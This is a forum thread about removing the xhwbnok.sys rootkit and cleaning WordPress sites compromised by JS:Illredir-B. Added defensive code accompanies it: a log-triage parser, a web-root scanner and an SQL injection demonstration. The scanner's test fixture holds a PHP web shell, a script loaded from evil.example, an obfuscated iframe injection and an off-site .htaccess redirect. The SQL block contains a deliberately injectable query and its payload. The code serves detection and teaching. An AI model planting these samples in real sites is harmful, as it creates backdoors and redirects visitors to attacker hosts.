I have xhwbnok.sys in my system

My computer is infected! I have xhwbnok.sys in c:\WINDOWS\system32\drivers\. The Avast free version found it as suspicious activity, but the Professional edition (which I bought specially for this) doesn’t report anything suspicious. Every time I connect to the internet, services.exe starts sending e-mail messages. I just bought Avast after a few years on the free version. It’s a rootkit, I think.
Anyone from Avast?

Google search gave no hits on xhwbnok.sys

Boot time Avast Antivirus Scanning
http://www.digitalred.com/avast-boot-time.php

Check your computer for malware with

MBAM http://filehippo.com/download_malwarebytes_anti_malware/
Update it and run a quick scan; click the “Remove Selected” button to quarantine anything found, then restart.

SAS http://filehippo.com/download_superantispyware/

Are cookies really spyware and are they dangerous?
http://www.superantispyware.com/supportfaqdisplay.html?faq=26

If anything is found other than cookies, you may post the scan logs here.

This was found by the anti-rootkit scan 8 minutes after boot; is that correct? See below:

“A suspicious file has been detected (using a heuristic method). This may be a sign of malware infection. Please allow the file to be submitted to our virus lab for analysis.”

If so, ensure that you allow it to be sent for analysis. I don’t believe that anything would be found on a boot-time scan, as this suspect rootkit may not be running before Windows is fully up and running.

I also believe it is a rootkit. You could also check the offending/suspect file at VirusTotal (multi-engine online virus scanner) and report the findings here: the URL in the address bar of the VT results page.

It is possibly hooking services.exe for use in sending email; if you haven’t already done so, block services.exe from internet access in your firewall (which is?).

Thank you, DavidR and Pondus, for your quick answers. And Happy New Year to you and to all of the forum users.

@Pondus
What I tried before:
Sophos installed - nothing
Scanned with NOD32 - nothing

http://www.digitalred.com/avast-boot-time.php
I ran many boot scans; Avast reports that all is OK.

Malwarebytes Anti-Malware: No malicious items were detected, but in a previous scan it found:
Files Infected:
C:\Documents and Settings\LocalService\Application Data\fvgqad.dat (Malware.Trace) → No action taken.
C:\Documents and Settings\NetworkService\Application Data\fvgqad.dat (Malware.Trace) → No action taken.

RootkitRevealer found the following registry paths:

HKLM\SYSTEM\ControlSet001\Services\xhwbnok - 0 bytes, Hidden from Windows API
HKLM\SYSTEM\ControlSet003\Services\xhwbnok - 0 bytes, Hidden from Windows API

In safemode, xhwbnok is the second process loaded.

From time to time, Avast tells me that there is a resident virus in memory, tells me that I can remove it (but it doesn’t remove it), and recommends that I ignore it and schedule a boot scan, but it doesn’t find anything.

@DavidR, yes, what you say is correct, but none of the boot scans identify anything like a virus or rootkit.

But when I try to report the file, all the browsers either get stuck on the upload page (Chrome) or say “0 bytes size received / An empty file has been received”.
The file has 763,904 bytes (increasing from time to time).
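The RootkitRevealer and MBAM lines quoted above are the two views you need to correlate: a service key that the raw hive contains but the Windows API does not return, and the driver file a service of that name would load. The following is an added example, not code from the thread or from Sysinternals or Malwarebytes: a small triage parser that reads both log formats as they appear on this page, keeps only the discrepancy class that indicates active hiding, derives the driver path under system32\drivers for each hidden service, and joins it with the MBAM detections so you get one record per suspect with every ControlSet key and file that has to go. The log text is copied from the thread; the two SomeVendor lines are constructed to show the benign discrepancy classes the parser deliberately ignores, and the system root is an assumption.

```python
"""Triage parser for RootkitRevealer + MBAM output (added example, not the
thread's or the tools' own code).  Log lines below: the first two RKR lines
and both MBAM lines are from the thread; the SomeVendor lines are constructed."""

import re
from collections import defaultdict

RKR_LOG = """\
HKLM\\SYSTEM\\ControlSet001\\Services\\xhwbnok - 0 bytes, Hidden from Windows API
HKLM\\SYSTEM\\ControlSet003\\Services\\xhwbnok - 0 bytes, Hidden from Windows API
HKLM\\SOFTWARE\\SomeVendor\\Settings - 0 bytes, Key name contains embedded nulls (*)
HKLM\\SOFTWARE\\SomeVendor\\Settings\\LastRun - 8 bytes, Data mismatch between Windows API and raw hive data.
"""

MBAM_LOG = """\
Files Infected:
C:\\WINDOWS\\system32\\drivers\\xhwbnok.sys (Rootkit.Agent) -> No action taken.
C:\\Documents and Settings\\LocalService\\Application Data\\fvgqad.dat (Malware.Trace) -> No action taken.
"""

# "<path> - <n> bytes, <discrepancy>" as condensed in the thread.
RKR_LINE = re.compile(r"^(?P<path>.+?) - (?P<size>\d+) bytes, (?P<discrepancy>.+?)\.?$")
# Only keys directly under a ControlSet's Services hive name a driver/service.
SERVICE_KEY = re.compile(
    r"^HKLM\\SYSTEM\\(?P<control_set>ControlSet\d{3}|CurrentControlSet)\\Services\\(?P<name>[^\\]+)$",
    re.IGNORECASE,
)
# "<path> (<family>) -> <action>" as MBAM prints it.
MBAM_LINE = re.compile(r"^(?P<path>[A-Za-z]:\\.+?) \((?P<family>[^)]+)\) (?:->|→) (?P<action>.+?)\.?$")

# Discrepancy classes that mean something is actively hiding the object.
# Embedded-null key names and API/raw-hive data mismatches are produced by
# Windows itself routinely and are not treated as hiding here.
HIDING = ("Hidden from Windows API",)


def parse_rootkitrevealer(text):
    out = []
    for line in text.splitlines():
        m = RKR_LINE.match(line.strip())
        if m:
            out.append({"path": m["path"], "size": int(m["size"]), "discrepancy": m["discrepancy"]})
    return out


def parse_mbam(text):
    out = []
    for line in text.splitlines():
        m = MBAM_LINE.match(line.strip())
        if m:
            out.append({"path": m["path"], "family": m["family"], "action": m["action"]})
    return out


def triage(rkr_text, mbam_text, system_root="C:\\WINDOWS"):
    """One record per service whose key RootkitRevealer saw only in the raw hive."""
    suspects = defaultdict(lambda: {"hidden_keys": [], "control_sets": [], "driver": None, "detections": []})
    for f in parse_rootkitrevealer(rkr_text):
        if f["discrepancy"] not in HIDING:
            continue
        m = SERVICE_KEY.match(f["path"])
        if not m:
            continue
        name = m["name"].lower()
        rec = suspects[name]
        rec["hidden_keys"].append(f["path"])
        rec["control_sets"].append(m["control_set"])
        # A service X under Services\X conventionally loads system32\drivers\X.sys
        # (assumed layout); this is the file to hand to a boot-time scan or to hash.
        rec["driver"] = f"{system_root}\\system32\\drivers\\{name}.sys"
    for d in parse_mbam(mbam_text):
        base = d["path"].rsplit("\\", 1)[-1].lower()
        if base.endswith(".sys") and base[:-4] in suspects:
            suspects[base[:-4]]["detections"].append(d)
    for rec in suspects.values():
        # An unresolved detection plus an API-hidden key means user-mode tools
        # will keep failing: the file has to go first (boot-time/reboot
        # removal), the keys in every listed ControlSet afterwards.
        rec["detection_unresolved"] = any(d["action"].lower().startswith("no action") for d in rec["detections"])
    return dict(suspects)


if __name__ == "__main__":
    for name, rec in triage(RKR_LOG, MBAM_LOG).items():
        print(name, rec)
```

Feed it the full RootkitRevealer and MBAM logs rather than the excerpts; anything that is not a hidden Services key drops out, which is what you want when the report is long.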

Well, the RootkitRevealer scan result on HKLM\SYSTEM\ControlSet001\Services\xhwbnok pretty much confirms Avast’s suspicion, so I think that on the next detection you could allow Avast to delete it.

I don’t know if the memory thing is related to the suspect rootkit detection; let’s see what happens when you allow Avast to delete it.

I haven’t used RootkitRevealer in a long while, but it doesn’t have a function to remove those entries, so if you are confident enough you could manually remove them using regedit.

The “0 bytes received” is obviously its protection trying to block anything that tries to analyse or remove it.

I would run MBAM again and allow it to remove the items detected, as they look like good detections.

Avast cannot delete the file. I also used other programs that schedule the deletion on reboot. Nothing.
I tried to remove them manually with regedit many times, but the keys cannot be accessed or deleted.
MBAM finally found:
Files Infected:
C:\WINDOWS\system32\drivers\xhwbnok.sys (Rootkit.Agent) → No action taken.
but it cannot remove it.

Thank you for your answer, DavidR; I will reinstall my system. We need a fresh start every year, right? :)

There may be a process running in Task Manager that is protecting it, which you may have to end before being able to remove it. These rootkits, once established, can be a real pain to remove.

Before you reinstall, try this anti-rootkit, which the Avast anti-rootkit scan is based on:
GMER, see http://www.gmer.net/

Thank you for everything, DavidR.
I updated MBAM and it finally succeeded in removing the rootkit on reboot:
Files Infected:
C:\WINDOWS\system32\drivers\xhwbnok.sys (Rootkit.Agent)
But the registry entries are still there.

Thank you again,
Mugur

You’re welcome.

If the file is truly gone, then you should be able to manually remove the registry entries (though I’m a little surprised MBAM didn’t do that too; try running it again), but you would have to take ownership of the registry key (right-click, Permissions, add your user name with Full Control) to be able to delete it.

I’d like to share the probable cause of my computer’s infection: it is about JS:Illredir-B [Trj]. Before Christmas, all my hosted accounts running WordPress were infected. All my problems began then.
For other details, see http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/ .
Now I have started to disinfect my accounts :) It was a mess.

Good luck to all

Just cleaning up after the infection is only part of the job, as you have to ensure that you are running the latest version of WordPress; it was no doubt an old version with a vulnerability that was being exploited (or it is likely to be back).

HACKED SITES: see http://www.scmagazineus.com/Every-36-seconds-a-website-is-infected/article/140414/.

This is commonly down to old content management software being vulnerable (PHP, Joomla, WordPress, SQL, etc.); see this example of a host’s response to a hacked site.

We have patched up the server, and we found a weakness in PHP which was aiding the compromise of some domains. We updated it and changed some default settings to help prevent these coding compromises. The weaknesses were not server-wide but rather just made it easier for a hacker to compromise individual end-user accounts.

I suggest the following clean-up procedure for both your accounts:

  1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers, check any “default.aspx” or “default.cfm” pages, as those are popular targets too.

  2. Remove any “rogue” files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end-user account.

  3. Check all .htaccess files, as hackers like to load redirects into them.

  4. Change all passwords for that end-user account: the cPanel password, the FTP password, and any FTP sub-accounts. Make sure to use a “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This, coupled with our server-side changes, should prevent any resurfacing of the hackers’ efforts. In some cases you may still have coding which allows for injection. All user input fields, hidden or not, should be hard-coded, filtered, and sanitized before being handed off to PHP or a database, which will prevent coding characters from being submitted and run through your software.

Also see Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
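The host's steps 1 to 3 above are mechanical enough to script against a copy of the web root pulled down over FTP. The following is an added example, not the host's or the thread's code: a scanner that walks the tree and applies those three checks, flagging script tags on index/default pages that load from a foreign host or use obfuscation idioms, hidden iframes, PHP files that eval decoded payloads or sit inside an uploads directory, and .htaccess rules that redirect off-site or key on a search-engine referer. Step 4 (password rotation) has no code. The site tree is constructed in a temporary directory for the demo, the indicators are generic ones rather than a signature for JS:Illredir-B, and the `own_hosts` list is an assumed parameter naming the site's legitimate hostnames.

```python
"""Web-root injection scanner (added example; the fixture tree is constructed)."""

import os
import re
import tempfile
from urllib.parse import urlparse

# Pages the host singled out as the usual injection targets.
INDEX_PAGES = re.compile(r"^(index\.(php|html?)|default\.(aspx|cfm|htm))$", re.IGNORECASE)
# Inline-script idioms that injected redirectors use and themes almost never do.
JS_OBFUSCATION = re.compile(r"(String\.fromCharCode|unescape\s*\(|document\.write\s*\(\s*unescape|eval\s*\()", re.IGNORECASE)
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*(width\s*=\s*['\"]?0|height\s*=\s*['\"]?0|visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"](?P<src>[^'\"]+)", re.IGNORECASE)
# PHP calls that make up the typical dropped backdoor (eval(base64_decode(...))).
PHP_DANGER = re.compile(r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|passthru|shell_exec|system|exec|assert)\s*\(", re.IGNORECASE)
DECODERS = {"base64_decode", "gzinflate", "gzuncompress", "str_rot13"}
# .htaccess lines that send visitors off-site, or that only fire for search-engine traffic.
HTACCESS_REDIRECT = re.compile(r"^\s*(RewriteRule\s+\S+\s+https?://|Redirect(?:Match|Permanent)?\s+.*https?://|ErrorDocument\s+\d+\s+https?://)", re.IGNORECASE)
HTACCESS_SE_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_(?:REFERER|USER_AGENT)\}\s+.*(?:google|bing|yahoo|msn)", re.IGNORECASE)

# Constructed fixture: one infected index page, one backdoor in uploads, one
# planted .htaccess, plus clean files the scanner must leave alone.
FIXTURE = {
    "index.php": ('<?php get_header(); ?>\n<script src="/wp-includes/js/jquery.js"></script>\n'
                  '<script src="http://evil.example/t.js"></script>\n'
                  "<script>document.write(unescape('%3Ciframe%20src%3D'))</script>\n"),
    "wp-content/uploads/2009/12/shell.php": "<?php eval(base64_decode($_POST['c'])); ?>",
    "wp-includes/class-wp.php": "<?php class WP { function main() { return true; } } ?>",
    ".htaccess": ("RewriteEngine On\nRewriteCond %{HTTP_REFERER} .*google.* [NC]\n"
                  "RewriteRule ^(.*)$ http://evil.example/go.php [R=302,L]\n"),
    "blog/.htaccess": "Options -Indexes\n",
    "default.aspx": "<html><body>hello</body></html>",
}


def build_fixture(files=FIXTURE):
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def check_index_page(rel, text, own_hosts):
    out = []
    for m in SCRIPT_SRC.finditer(text):
        host = urlparse(m["src"]).hostname  # None for same-site relative paths
        if host and host.lower() not in own_hosts:
            out.append((rel, "index-page", f"script loaded from foreign host {host}"))
    if JS_OBFUSCATION.search(text):
        out.append((rel, "index-page", "obfuscated inline script"))
    if HIDDEN_IFRAME.search(text):
        out.append((rel, "index-page", "hidden iframe"))
    return out


def check_php(rel, text):
    calls = {c.lower() for c in PHP_DANGER.findall(text)}
    reasons = []
    if "eval" in calls and calls & DECODERS:
        reasons.append("eval of decoded payload")
    if len(calls) >= 3:
        reasons.append("multiple dangerous calls: " + ", ".join(sorted(calls)))
    if "uploads" in rel.split("/"):  # PHP has no business under wp-content/uploads
        reasons.append("PHP inside an uploads directory")
    return [(rel, "rogue-php", r) for r in reasons]


def check_htaccess(rel, text):
    out = []
    for line in text.splitlines():
        if HTACCESS_REDIRECT.match(line):
            out.append((rel, "htaccess", "external redirect: " + line.strip()))
        elif HTACCESS_SE_COND.match(line):
            out.append((rel, "htaccess", "search-engine conditional rewrite: " + line.strip()))
    return out


def scan(root, own_hosts=()):
    """Return (relative path, check, detail) triples for everything worth a look."""
    own_hosts = {h.lower() for h in own_hosts}
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if INDEX_PAGES.match(fn):
                findings += check_index_page(rel, text, own_hosts)
            if fn.lower().endswith(".php"):
                findings += check_php(rel, text)
            if fn == ".htaccess":
                findings += check_htaccess(rel, text)
    return sorted(findings)


if __name__ == "__main__":
    for finding in scan(build_fixture(), own_hosts=("www.example.com",)):
        print(*finding, sep=" | ")
```

Run it against a download of the account, not the live site: a compromised server can lie about its own files, and the copy also gives you something to diff against a clean WordPress release of the same version.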
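The host's closing point, that user input must be filtered and sanitized before it reaches PHP or a database, is usually implemented best by keeping the data out of the query text altogether. The following is an added example, not the host's or the thread's code: the injectable pattern the host warns about beside its parameterized replacement, plus the allow-list check you need for the one thing a placeholder cannot bind (a column name coming from a hidden form field). It uses Python's sqlite3 on a constructed in-memory table; the PHP equivalent is a PDO prepared statement. The `lookup_vulnerable` function is deliberately injectable to show the difference.

```python
"""Injectable lookup beside its parameterized form (added example; table is constructed)."""

import sqlite3

ALLOWED_SORT_FIELDS = {"name", "email"}


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, email TEXT, role TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "admin"), ("bob", "bob@example.com", "subscriber")],
    )
    return con


def lookup_vulnerable(con, name):
    # The "before": user input concatenated into the SQL text.  A name such as
    # ' OR '1'='1 turns the WHERE clause into a tautology and returns every row.
    return con.execute(f"SELECT name, email FROM users WHERE name = '{name}'").fetchall()


def lookup_safe(con, name):
    # Placeholder binding: the driver passes the value separately from the
    # query text, so quote characters in it are data, never syntax.
    return con.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def list_sorted(con, sort_field):
    # Identifiers cannot be bound as parameters, so a sort field taken from a
    # (hidden) form field is validated against an allow-list before use.
    if sort_field not in ALLOWED_SORT_FIELDS:
        raise ValueError(f"unexpected sort field: {sort_field!r}")
    return con.execute(f"SELECT name, email FROM users ORDER BY {sort_field}").fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))
    print("safe:      ", lookup_safe(db, payload))
```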